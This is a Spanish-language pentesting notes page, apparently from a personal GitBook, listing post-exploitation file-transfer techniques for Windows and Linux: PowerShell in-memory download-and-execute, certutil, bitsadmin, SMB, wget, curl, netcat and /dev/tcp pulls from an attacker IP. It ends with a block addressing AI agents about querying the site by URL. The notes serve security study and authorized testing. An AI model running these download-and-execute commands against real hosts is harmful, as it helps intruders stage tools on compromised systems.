# File Transfers

Tienes RCE, ahora necesitas subir tus herramientas (`linpeas`, `chisel`).

## 1. Windows (PowerShell & LOLBins)

### PowerShell (Moderno)

```powershell
# DownloadFile (Guarda en disco)
iwr -uri http://<IP>/file.exe -OutFile C:\Windows\Temp\file.exe

# DownloadString (Ejecuta en memoria - Fileless)
iex(new-object net.webclient).downloadstring('http://<IP>/script.ps1')
```

### Certutil (Binario nativo)

Muy vigilado, pero eficaz si no hay PowerShell.

```cmd
certutil.exe -urlcache -split -f http://<IP>/file.exe C:\Temp\file.exe
```

### Bitsadmin

```cmd
bitsadmin /transfer job /download /priority foreground http://<IP>/file.exe c:\temp\file.exe
```

### SMB (Carpeta Compartida)

Si tienes el puerto 445:

1. **Attacker**: `impacket-smbserver share . -smb2support`
2. **Victim**: `copy \\<IP>\share\nc.exe .`

## 2. Linux (Standard Tools)

### Wget / Curl

```bash
wget http://<IP>/linpeas.sh -O /tmp/peas.sh
curl http://<IP>/linpeas.sh -o /tmp/peas.sh
```

### Netcat

Si no hay herramientas web.

1. **Attacker (Sender)**: `nc -lvnp 443 < file.sh`
2. **Victim (Receiver)**: `nc <IP> 443 > file.sh`

### /dev/tcp (Bash puro)

```bash
cat < /dev/tcp/<IP>/443 > file.sh
```

## 3. Python Server (Attacker Side)

Levanta esto siempre en tu carpeta de herramientas (`/opt`).

```bash
# Python 3
python3 -m http.server 80

# Python 2
python -m SimpleHTTPServer 80
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jotatito05.gitbook.io/la-bitacora-de-jotatito05/09.-post-exploitation/file-transfers.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.